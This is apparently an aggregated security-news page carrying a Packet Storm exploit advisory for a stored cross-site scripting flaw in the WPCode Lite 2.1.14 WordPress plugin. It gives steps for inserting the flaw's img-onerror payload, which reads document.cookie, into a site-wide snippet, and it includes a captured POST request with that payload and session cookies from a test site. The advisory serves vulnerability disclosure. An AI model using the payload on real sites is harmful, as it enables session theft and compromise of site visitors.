Security
Headlines
HeadlinesLatestCVEs

Headline

WordPress WPCode Lite 2.1.14 Cross Site Scripting

WordPress WPCode Lite plugin version 2.1.14 suffers from a persistent cross site scripting vulnerability.

Packet Storm
#xss#vulnerability#web#windows#wordpress#php#auth#firefox
# Exploit Title: Wordpress WPCode Lite Version 2.1.14 Stored XSS# Date: 2024-06-30# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://wpcode.com/?utm_source=wprepo&utm_medium=link&utm_campaign=liteplugin# Version 2.1.14### Steps to Execute the Payload:1. **Access the Admin Panel:**   - Navigate to the admin panel of your WordPress site.   - Go to `Code Snippets > `Edit Snippet` via the following URL:      ```     https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10     ```2. **Insert the Payload:**   - In the **Code Preview** section, insert the following payload:     ```     "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>     ```3. **Save and Verify:**   - Active , Save the changes.   - Navigate to the main page of your site:     ```     https://127.0.0.1/     ```   - You should see the payload executed.Post Request :POST /wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10 HTTP/2Host: 127.0.0.1Cookie: wordpress_sec_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C37619eff632d24400e28a219976a87efa83c4bae1ebe04120e54cb37dbe30a03; wordpress_logged_in_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C49992c3be16529995b5429fdd992a2dc1ff8cafa77c6f72580d9dbf9f3fe82ca; wp-settings-time-1=1719753966; WP-TSW-Session=5lursai747c2vcd5uno86liv2c; wp-settings-1=editor%3DhtmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10Content-Type: application/x-www-form-urlencodedContent-Length: 673Origin: https://vagabondcreature.s3-tastewp.comDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailerswpcode_active=&button=publish&wpcode_snippet_title=Untitled+Snippet&wpcode_snippet_type=html&wpcode_snippet_code=%22%3E%3Cimg+src%3Dx+onerrora%3Dconfirm%28%29+onerror%3Dconfirm%28document.cookie%29%3E&wpcode_snippet_text=%3Cp%3E%22%26gt%3B%3Cimg+src%3D%22x%22+%2F%3E%3C%2Fp%3E&wpcode_auto_insert=1&wpcode_auto_insert_location_extra=&wpcode_auto_insert_number=1&wpcode_auto_insert_location=site_wide_header&wpcode-schedule-start=&wpcode-schedule-end=&wpcode_cl_rules=%5B%5D&wpcode_tags=&wpcode_priority=10&wpcode_note=&id=10&wpcode-save-snippet-nonce=73d127c1c2&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwpcode-snippet-manager%26snippet_id%3D10%26message%3D1%26error

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution